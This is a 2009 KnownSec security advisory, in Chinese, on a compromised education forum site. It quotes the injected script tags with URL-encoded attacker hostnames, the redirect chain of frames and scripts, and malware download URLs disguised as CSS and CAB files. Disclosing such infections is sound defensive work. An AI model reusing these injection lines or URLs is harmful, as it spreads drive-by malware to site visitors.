发布时间:Wed Apr 29 2009 14:35:47 UTC+0800
最后更新时间:Wed Apr 29 2009 14:35:47 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 洪濑学区网站联盟(http://teacherbbs.net/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://teacherbbs.net/
网页被嵌入恶意链接代码:
<script src=http://%6D%62%72%37%2E%63%6E></script><script src=http://%6D%62%72%32%2E%63%6E></script><script src=http://%6D%62%72%38%2E%63%6E></script><script src=http://%33%38%7A%75%2E%63%6E></script><script src=http://%31%31%37%6C%61%2E%63%6E></script>
挂马分析:
[wide]http://teacherbbs.net/
[frame]http://www.wohenleile.cn/sina/a112.htm?01
[script]http://%6d%62%72%37%2e%63%6e
[frame]http://www.900990.cn/a10/a10.htm
[frame]http://www.900990.cn/a10/new.html
[script]http://www.900990.cn/a10/../zhin.js
[frame]http://www.900990.cn/a10/../14.htm
[frame]http://www.900990.cn/a10/fx.htm
[frame]http://www.900990.cn/a10/../cx.htm
[frame]http://www.900990.cn/a10/../real10.htm
[frame]http://www.900990.cn/a10/../real11.htm
[script]http://www.900990.cn/a10/../wewew.js
[script]http://s33.cnzz.com/stat.php?1d=1382384&web_id=1382384&show=pic
[script]http://s33.cnzz.com/stat.php?id=1382384&web_id=1382384&show=pic
[script]http://%6d%62%72%32%2e%63%6e
[script]http://%6d%62%72%38%2e%63%6e
[script]http://%33%38%7a%75%2e%63%6e
[script]http://%31%31%37%6c%61%2e%63%6e
最终下载病毒文件:
http://www.19399.com.cn/lzz.css
http://www.19399.com.cn/as.css
http://www.19399.com.cn/bf.css
http://www.19399.com.cn/ms.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇:专业的WEB安全公司 www.knownsec.com
Popularity: 3% [?]
